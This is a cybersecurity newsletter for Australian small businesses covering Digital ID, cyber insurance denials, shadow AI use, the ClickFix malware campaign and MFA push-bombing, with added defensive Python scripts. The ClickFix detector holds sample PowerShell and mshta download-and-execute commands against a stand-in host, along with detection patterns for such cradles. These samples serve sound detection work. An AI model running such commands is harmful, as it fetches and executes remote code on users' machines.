Jam Cyber Brief
June 2026 Edition
New identity technology is arriving, staff are adopting AI tools without telling IT, and attackers have added phone calls to a social engineering toolkit that no longer relies on email.
There is genuine good news in this edition, and the common thread through both the threats and the opportunities is the same: knowing what is happening inside your own business before something goes wrong.
IT & Cyber Trends We Are Seeing Right Now
A government identity milestone, an uncomfortable insurance reality, and the AI tools no one in IT knows about
Australia's Digital ID Is Opening to Private Sector Businesses from Late 2026
Australia's Digital ID system has 15 million myIDs and has processed 80 million verifications across 246 government services. From December 2026, accredited private sector providers and entities will be able to apply to participate in the system. Law firms and accounting firms will then have a way to verify client identity without collecting and holding physical copies of passports and driver's licences.
The government's myID platform lets individuals verify their identity once through a government-accredited provider, then share a cryptographic confirmation rather than a physical document. AML/CTF guidance is being updated to allow Digital ID to be used to meet Know-Your-Customer requirements, making this directly relevant to professional services firms with client due diligence obligations.
Businesses that begin assessing Digital ID readiness now will be ahead when applications open. The registration of interest form is already live at digitalidsystem.gov.au.
What to do next
Register your interest at digitalidsystem.gov.au, where the system administrator will contact you with further information ahead of the opening.
Ask your IT provider how Digital ID could integrate with your client onboarding processes.
Review your current document collection practices and consider where Digital ID reduces your exposure.
Why Cyber Insurance Claims Are Being Denied More Often
Industry commentary suggests insurers are now denying more than 40% of cyber insurance claims. In many denied-claim scenarios, the issue is not whether the breach happened, but whether the business can prove the controls declared on the application were in place and maintained.
Cyber insurance is now a warranty arrangement, not a safety net. If a claim is made and the controls declared on the application are not in place, the insurer rejects it regardless of the damage caused.
Industry analysis suggests MFA failure accounts for around 37% of rejected claims, typically from businesses that ticked "yes" on the application without enforcing Multi-Factor Authentication (MFA) consistently across all their systems. As the Jam Cyber team sees it in practice: IT and cyber are no longer set and forget. A policy issued on last year's declared controls may not pay out if those controls are not actively maintained today.
What to do next
Review your cyber insurance application and confirm every declared control is genuinely in place today.
Ask your IT provider for written confirmation of MFA coverage across all systems, not just email.
Schedule a backup restoration test and document the result, as insurers increasingly treat a completed test as required evidence rather than a declaration.
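The insurance point above is that "MFA: yes" on an application is a claim about every system, not just email. The script below is an added example for this brief (not Jam Cyber's own tooling) showing how an IT provider can reconcile account exports from each system into the written MFA coverage confirmation the second action item asks for. The account rows are constructed; real exports would need mapping to the assumed (system, username, account_type, mfa_enforced) shape.

```python
"""Reconcile MFA enforcement across every system before attesting to it on an insurance form.

Added example for this brief, not Jam Cyber's tooling. ACCOUNT_EXPORTS is
constructed to resemble what an IT provider can pull from an identity provider,
a VPN appliance, a line-of-business app and a remote desktop gateway.
"""
from collections import defaultdict

INTERACTIVE = {"user", "admin"}  # accounts a person signs in with; these are what "MFA: yes" covers

# Constructed exports: one row per account on each system.
# (system, username, account_type, mfa_enforced)
ACCOUNT_EXPORTS = [
    ("Microsoft 365", "alice", "user", True),
    ("Microsoft 365", "bob", "user", True),
    ("Microsoft 365", "scanner-svc", "service", False),  # device mailbox, cannot do push MFA
    ("VPN", "alice", "user", True),
    ("VPN", "bob", "user", False),               # VPN still password-only for this user
    ("VPN", "contractor1", "user", False),
    ("Practice Mgmt", "alice", "user", False),   # the app has no MFA option at all
    ("Practice Mgmt", "bob", "user", False),
    ("Remote Desktop", "admin", "admin", False),
]


def coverage_by_system(rows):
    """Return {system: (interactive_accounts_with_mfa, interactive_accounts)}."""
    totals = defaultdict(lambda: [0, 0])
    for system, _user, acct_type, mfa in rows:
        if acct_type not in INTERACTIVE:
            continue
        totals[system][1] += 1
        if mfa:
            totals[system][0] += 1
    return {system: (c[0], c[1]) for system, c in totals.items()}


def mfa_gaps(rows):
    """Interactive accounts with no MFA: each one contradicts a blanket 'MFA: yes' declaration."""
    return [(s, u, t) for s, u, t, mfa in rows if t in INTERACTIVE and not mfa]


def service_accounts_without_mfa(rows):
    """Reported separately: these need a compensating control (IP restriction,
    conditional access, key-based auth) and an explanation on the application."""
    return [(s, u) for s, u, t, mfa in rows if t not in INTERACTIVE and not mfa]


def attestation_report(rows):
    """The evidence an insurer expects: per-system coverage plus the exact gaps."""
    cov = coverage_by_system(rows)
    gaps = mfa_gaps(rows)
    return {
        "can_attest_mfa_everywhere": not gaps,
        "systems_fully_covered": sorted(s for s, (ok, n) in cov.items() if ok == n),
        "systems_with_gaps": sorted(s for s, (ok, n) in cov.items() if ok < n),
        "gaps": gaps,
        "service_accounts_without_mfa": service_accounts_without_mfa(rows),
    }


if __name__ == "__main__":
    report = attestation_report(ACCOUNT_EXPORTS)
    for system, (ok, n) in sorted(coverage_by_system(ACCOUNT_EXPORTS).items()):
        print(f"{system:15} MFA enforced on {ok}/{n} interactive accounts")
    print("Can attest MFA everywhere:", report["can_attest_mfa_everywhere"])
    for gap in report["gaps"]:
        print("  gap:", gap)
```

In the constructed data email (Microsoft 365) is fully covered, which is exactly the situation the article describes: a business that would tick "yes" while the VPN, the practice management system and the remote desktop gateway have no MFA at all. Re-running this against fresh exports at renewal time, and keeping the output, is the "actively maintained" evidence the policy depends on.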
Shadow IT and AI: The Tools No One in IT Knows About
Staff are using AI tools to build, design, and automate without telling IT. There is no approval process, no governance, and no visibility into what data those platforms are handling or where it ends up.
Platforms like Canva AI, ChatGPT, and Notion AI let a non-technical staff member build a client portal or process a database of client records in an afternoon, with no IT involvement. The risk is not always deliberate. A paralegal running client data through an AI summariser is not trying to cause a breach, but processing personal information through an external platform with no data processing agreement may create a privacy or security issue that needs formal breach assessment.
According to CPA Australia, 71% of Australian businesses plan to increase their use of AI in 2026. The ACSC guidance for small businesses is clear that governance needs to keep pace with adoption.
What to do next
Ask your IT provider to conduct a shadow IT audit to identify which cloud tools and AI platforms are currently active across the business.
Establish a simple, fast approval process so staff can get a decision quickly rather than bypassing IT because it is too slow.
Check whether any AI-generated outputs used in client work were produced using data fed into an external platform.
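A shadow IT audit usually starts from the web proxy or secure DNS logs the business already has. The script below is an added example for this brief (not Jam Cyber's tooling) that parses constructed proxy log lines, attributes traffic to AI platforms per user, and separates two findings: known AI platforms receiving large uploads, and large POSTs to external hosts nobody has categorised yet. The key=value log format, the ".internal" suffix for internal hosts and the small domain catalogue are all assumptions; a real audit would use the proxy's own export format and a vendor category feed.

```python
"""Shadow AI discovery from web proxy logs.

Added example for this brief, not Jam Cyber's tooling. LOG_LINES are
constructed; AI_PLATFORMS is a hand-picked catalogue used as an assumption.
"""
import re
from collections import defaultdict

# Constructed proxy log lines (one request each).
LOG_LINES = """\
2026-05-12T09:14:03Z user=alice dst=chatgpt.com method=POST bytes_out=48213 status=200
2026-05-12T09:20:41Z user=alice dst=chatgpt.com method=POST bytes_out=2611204 status=200
2026-05-12T10:02:17Z user=bob dst=www.canva.com method=POST bytes_out=913400 status=200
2026-05-12T10:05:55Z user=bob dst=api.notion.so method=POST bytes_out=12000 status=200
2026-05-12T10:07:01Z user=carol dst=intranet.example.internal method=GET bytes_out=0 status=200
2026-05-12T11:30:09Z user=carol dst=summarise-anything.example method=POST bytes_out=5400000 status=200
""".splitlines()

# Domain -> platform name. Assumed catalogue; extend from your proxy vendor's category list.
AI_PLATFORMS = {
    "chatgpt.com": "ChatGPT",
    "openai.com": "ChatGPT",
    "canva.com": "Canva",
    "notion.so": "Notion",
    "claude.ai": "Claude",
    "gemini.google.com": "Gemini",
}

LINE_RE = re.compile(
    r"^(?P<ts>\S+) user=(?P<user>\S+) dst=(?P<host>\S+) method=(?P<method>\S+) "
    r"bytes_out=(?P<bytes>\d+) status=(?P<status>\d+)$"
)


def parse_line(line):
    """Parse one constructed log line into a dict, or None if it does not match."""
    m = LINE_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["bytes"] = int(rec["bytes"])
    return rec


def classify(host):
    """Map a destination host to a platform by exact or parent-domain match."""
    host = host.lower()
    for domain, name in AI_PLATFORMS.items():
        if host == domain or host.endswith("." + domain):
            return name
    return None


def audit(lines):
    """Per (user, platform): request count and total bytes sent to the platform."""
    summary = defaultdict(lambda: {"requests": 0, "bytes_out": 0})
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        platform = classify(rec["host"])
        if platform is None:
            continue
        entry = summary[(rec["user"], platform)]
        entry["requests"] += 1
        entry["bytes_out"] += rec["bytes"]
    return dict(summary)


def flag_bulk_uploads(summary, min_bytes=1_000_000):
    """Users who pushed a meaningful volume of data into an AI platform: the first interview list."""
    return sorted((u, p, s["bytes_out"]) for (u, p), s in summary.items() if s["bytes_out"] >= min_bytes)


def uncategorised_uploads(lines, min_bytes=1_000_000):
    """Large POSTs to external hosts not in the catalogue: tools nobody has named yet."""
    found = []
    for line in lines:
        rec = parse_line(line)
        if rec is None or rec["method"] != "POST":
            continue
        if rec["host"].endswith(".internal") or classify(rec["host"]):
            continue
        if rec["bytes"] >= min_bytes:
            found.append((rec["user"], rec["host"], rec["bytes"]))
    return found


if __name__ == "__main__":
    summary = audit(LOG_LINES)
    for (user, platform), s in sorted(summary.items()):
        print(f"{user:8} {platform:8} requests={s['requests']} bytes_out={s['bytes_out']}")
    print("bulk uploads:", flag_bulk_uploads(summary))
    print("uncategorised uploads:", uncategorised_uploads(LOG_LINES))
```

Bytes sent, not request count, is the useful signal: a dozen chat prompts are a policy question, a 2.6 MB upload to a summariser may be a client file and therefore the breach-assessment question the article raises. The uncategorised list is what the audit exists to find, since the platforms you already know about are not the shadow ones.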
Current Cyber Threats for Australian SMEs
Two active ACSC advisories, a major Australian fintech breach, and an attack that bypasses many of the controls you rely on
ACSC Warns of ClickFix Malware Campaign Targeting Australian Networks
Fake verification prompts on compromised Australian websites are tricking staff into installing credential-stealing malware. It can bypass some preventative controls once a user follows the instructions, and no malicious email is required.
The ACSC confirmed on 7 May 2026 that attackers have injected legitimate Australian WordPress websites with code that displays fake Cloudflare or CAPTCHA prompts. Visitors are told to copy a command into their Windows computer to verify they are human, and that command installs Vidar Stealer, which silently harvests saved passwords and session tokens from the infected device.
Read the full ACSC ClickFix advisory for technical details.
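Because ClickFix has the user paste the command into the Windows Run dialog rather than a browser, the chain that lands in endpoint telemetry is explorer.exe starting a script interpreter with a command line that fetches remote content. The detection below is an added example for this brief (not ACSC or Jam Cyber code) run over constructed process-creation events resembling Sysmon Event ID 1 or EDR process-start records; the field names and the example.invalid URLs are assumptions, and the indicator list is deliberately short.

```python
"""Detect the ClickFix execution chain in process-creation telemetry.

Added example for this brief, not ACSC or Jam Cyber code. EVENTS are
constructed; field names (host, user, parent_image, image, command_line)
are assumptions about the telemetry source.
"""
import re
from pathlib import PureWindowsPath

# Interpreters and fetch tools the pasted command typically invokes.
INTERPRETERS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe",
                "wscript.exe", "cscript.exe", "curl.exe", "certutil.exe"}

# (reason, case-insensitive pattern). A plain "powershell.exe" launched from
# Explorer by an admin matches none of these, which keeps the rule quiet.
INDICATORS = [
    ("remote URL in command line", re.compile(r"https?://", re.I)),
    ("hidden or non-interactive window", re.compile(r"-w(?:indowstyle)?\s+hidden|-nop\b|-noni\b", re.I)),
    ("encoded command", re.compile(r"-e(?:nc(?:odedcommand)?)?\s+[A-Za-z0-9+/=]{20,}", re.I)),
    ("download-and-execute cradle",
     re.compile(r"\b(?:iwr|invoke-webrequest|iex|invoke-expression|downloadstring)\b", re.I)),
]

# Constructed events. Only the first two are the ClickFix pattern.
EVENTS = [
    {"host": "WS-014", "user": "CORP\\alice", "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": 'powershell.exe -w hidden -c "iwr https://example.invalid/verify | iex"'},
    {"host": "WS-022", "user": "CORP\\bob", "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\mshta.exe",
     "command_line": "mshta.exe https://example.invalid/captcha"},
    {"host": "WS-003", "user": "CORP\\itadmin", "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": "powershell.exe"},  # admin opened a console: benign
    {"host": "WS-009", "user": "CORP\\dev", "parent_image": r"C:\Program Files\Code\Code.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": "powershell.exe -NoLogo"},  # IDE terminal: not this chain
    {"host": "WS-014", "user": "CORP\\alice", "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\notepad.exe", "command_line": "notepad.exe notes.txt"},
]


def basename(path):
    """Lower-cased file name of a Windows path, regardless of the analysis host's OS."""
    return PureWindowsPath(path).name.lower()


def classify_event(event):
    """Return the matched reasons if this is the Explorer -> interpreter -> remote content chain."""
    if basename(event["parent_image"]) != "explorer.exe":
        return []
    if basename(event["image"]) not in INTERPRETERS:
        return []
    return [reason for reason, rx in INDICATORS if rx.search(event["command_line"])]


def detect_clickfix(events):
    """One finding per event that matches, with the reasons for triage."""
    findings = []
    for event in events:
        reasons = classify_event(event)
        if reasons:
            findings.append({"host": event["host"], "user": event["user"],
                             "image": basename(event["image"]), "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in detect_clickfix(EVENTS):
        print(f"{f['host']} {f['user']} {f['image']}: {', '.join(f['reasons'])}")
```

The rule needs both halves: parent explorer.exe alone fires on every administrator who opens a console, and a download cradle alone fires on legitimate deployment scripts started from other parents. A hit here means the user has already run the command, so the response is the one the article implies for an infostealer: reset the passwords and revoke the sessions saved on that device, not just remove the file.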
Critical Website Hosting Flaw Actively Exploited Across Australia
Attackers exploited a pre-authentication bypass flaw in cPanel and WHM, the hosting control panel software managing an estimated 70 million domains. Reporting indicates exploitation may have occurred before public disclosure or patch availability, with hosting and managed hosting providers among the reported entry points into client systems.
The ACSC issued a critical alert on 1 May 2026 about CVE-2026-41940, which lets attackers take full administrative control of a hosting account without a password. Businesses relying on an external provider to manage their website may have been indirectly exposed even if they had no direct awareness of the vulnerability.
What to do next
Ask your hosting or IT provider to confirm the cPanel/WHM patch from late April 2026 has been applied.
Change administrative passwords for your hosting control panel and connected accounts as a precaution.
YouX Fintech Breach: A Threat Actor Claims 229,000 Australian Driver's Licences Exposed
A threat actor claimed to have obtained an estimated 229,000 Australian driver's licence numbers along with loan-application data and other personal information from Australian fintech YouX, and demanded payment to stop the release of stolen records.
229,000: driver's licences claimed by the threat actor in the YouX breach (9News)
7,740: organisations affected by ransomware globally in 2025 (Sophos, via SMBtech)
59%: share of Australian NDB notifications that involved malicious attacks (OAIC, Jan-Jun 2025)
Professional services firms and technology businesses holding financial or identity data are high-value ransomware targets. That data is directly tied to individual identity and credit, making it valuable to attackers and serious for affected clients.
What to do next
Confirm your business has tested, current backups that allow recovery without paying a ransom.
Verify your IT provider is actively monitoring your environment for unauthorised access.
Attackers Are Now Calling Your Staff Pretending to Be from IT Support
A live technique targeting Australian organisations floods a staff member with MFA push notification requests, then follows up with a phone call from someone posing as IT support. The ACSC has issued a specific advisory on this approach, and it works through people rather than systems.
The caller instructs the staff member to run a small "mailbox fix tool" to resolve the MFA problem, and that tool is malware. Once run, the attacker has access.
The ACSC's Scattered Spider advisory documents this exact pattern: phone-based IT impersonation, push-bombing to create confusion, and social engineering to get a user to run a remote access or fix tool.
What to do next
Tell staff never to run a tool at the instruction of someone who called them, even if the caller claims to be from IT.
Set up a simple verification rule: hang up and call back on a known IT number before taking any action.
Tell staff that an unexpected flood of MFA notifications signals an active attack: report it immediately and approve nothing.
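The flood of MFA prompts is visible to the business before the phone call happens, because every push request is logged by the identity provider. The script below is an added example for this brief (not ACSC or Jam Cyber code) that finds push-bombing bursts in constructed MFA audit records: a run of prompts for one user inside a short window, with an approval inside or just after the burst marked as the highest-priority case. The record shape (timestamp, user, result) and the thresholds are assumptions to tune against your own sign-in export.

```python
"""Flag MFA push-bombing bursts in authentication logs.

Added example for this brief, not ACSC or Jam Cyber code. PUSH_EVENTS are
constructed; a real identity-provider MFA audit export carries the same three
fields under different names.
"""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed MFA push events: (ISO timestamp, user, result).
PUSH_EVENTS = [
    ("2026-05-20T08:01:10", "alice", "denied"),
    ("2026-05-20T08:01:45", "alice", "denied"),
    ("2026-05-20T08:02:30", "alice", "timeout"),
    ("2026-05-20T08:03:05", "alice", "denied"),
    ("2026-05-20T08:04:12", "alice", "denied"),
    ("2026-05-20T08:05:40", "alice", "denied"),
    ("2026-05-20T08:07:02", "alice", "approved"),   # worn down, or talked into it by "IT support"
    ("2026-05-20T09:15:00", "bob", "approved"),     # normal morning sign-in
    ("2026-05-20T14:40:00", "bob", "approved"),
    ("2026-05-20T10:00:00", "carol", "denied"),     # a few scattered prompts: below threshold
    ("2026-05-20T10:06:00", "carol", "approved"),
    ("2026-05-20T10:14:00", "carol", "denied"),
    ("2026-05-20T10:19:00", "carol", "approved"),
]


def detect_push_bombing(events, threshold=5, window_minutes=10):
    """Return one finding per user whose prompts reach `threshold` inside `window_minutes`.

    Uses a sliding window over each user's sorted prompts; on the first breach the
    whole window from the burst start is reported, including any approval in it.
    """
    by_user = defaultdict(list)
    for ts, user, result in events:
        by_user[user].append((datetime.fromisoformat(ts), result))
    window = timedelta(minutes=window_minutes)
    findings = []
    for user, rows in by_user.items():
        rows.sort()
        start = 0
        for end in range(len(rows)):
            while rows[end][0] - rows[start][0] > window:
                start += 1
            if end - start + 1 >= threshold:
                burst_start = rows[start][0]
                burst = [r for r in rows[start:] if r[0] <= burst_start + window]
                non_approvals = sum(1 for _, result in burst if result != "approved")
                approved = any(result == "approved" for _, result in burst)
                findings.append({
                    "user": user,
                    "first_prompt": burst_start.isoformat(),
                    "prompts": len(burst),
                    "non_approvals": non_approvals,
                    "approved_in_window": approved,
                    # an approval after a wall of denials means the attacker is in: revoke sessions now
                    "priority": "critical" if approved else "high",
                })
                break
    return findings


if __name__ == "__main__":
    for f in detect_push_bombing(PUSH_EVENTS):
        print(f"{f['priority'].upper()} {f['user']}: {f['prompts']} prompts from {f['first_prompt']}, "
              f"{f['non_approvals']} not approved, approved_in_window={f['approved_in_window']}")
```

The "critical" branch is the one that matters operationally: the article's sequence ends with the staff member approving (or running the "fix tool") after the caller talks them through it, so an approval that follows a wall of denials should trigger session revocation and a password reset before anyone rings the user to ask what happened.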
Things to Keep on the Radar
One compliance deadline landing in weeks, and one technology question worth asking your IT provider today
Lawyers and Accountants: New Privacy Act Obligations from 1 July 2026
Under AML/CTF reforms taking effect on 1 July 2026, firms that become AML/CTF reporting entities because they provide designated services will need to comply with Privacy Act obligations for how they handle AML/CTF-related personal information, even if they are under the usual $3 million small-business exemption threshold.
What this means for your business
This applies to legal practitioners, conveyancers, and accounting firms providing designated services under the updated AML/CTF Act. For practices that have operated under the assumption that privacy law does not apply to them, this is a real change. At a minimum, it means knowing what personal information the firm holds for AML/CTF purposes, having a documented breach response process, and understanding the OAIC's reporting requirements.
The broader Tranche 2 Privacy Act reforms, expected during 2026 or 2027, may extend obligations more widely, so firms not caught by 1 July should still be building readiness now.
AI-Powered Security Is Already Built Into Software Most SMEs Are Paying For
Many businesses on Microsoft 365 Business Premium are already paying for Defender for Business, which includes AI-powered endpoint protection, endpoint detection and response, and automated investigation and remediation. In our experience, many businesses have not fully enabled or monitored it.
What this means for your business
If your IT provider has not discussed Defender for Business with you, ask directly whether it is deployed and whether someone is actively reviewing the alerts it generates. The capability is already included in what you are paying for. Businesses on lower Microsoft 365 tiers or on Google Workspace can get equivalent protection through standalone products now priced accessibly for SMEs.
Did You Know?
AI Integration: Questions Most Businesses Have Not Yet Answered
Most Australian businesses are somewhere on a spectrum with AI integration. The questions being asked most often are not about which tool to use. They are about what boundaries to set, what risks to understand, and whether the business is set up to use these tools without exposing client data.
The Jam Cyber team is working out what practical support for businesses navigating AI integration looks like. If this is something you are thinking through, we would welcome a conversation.
What questions should you be asking?
Most businesses do not know where to start with AI and data governance. We can help frame the right questions.
Where does your client data go?
Cloud AI platforms process data externally. Understanding the implications is the first step to managing the risk.
What does a workable policy look like?
A practical AI usage policy needs to be clear, realistic, and understood by your team.
Start the conversation
No commitment, no hard sell. Just a frank discussion about what a sensible approach looks like.
Final Thoughts
New tools and new attack techniques are arriving at the same time. The businesses navigating this well are not the ones with the largest budgets.
They are the ones asking better questions of their IT providers, reviewing their positions with clear eyes, and treating each new development as something to act on rather than file away.
Ready to take the next step?
Let's Talk About Where Your Business Stands
No jargon, no hard sell. Just a clear, honest picture of your cyber security and IT — and what to do about it.
More than 20 years protecting Australian businesses
Not a single fully protected client has been breached since 2017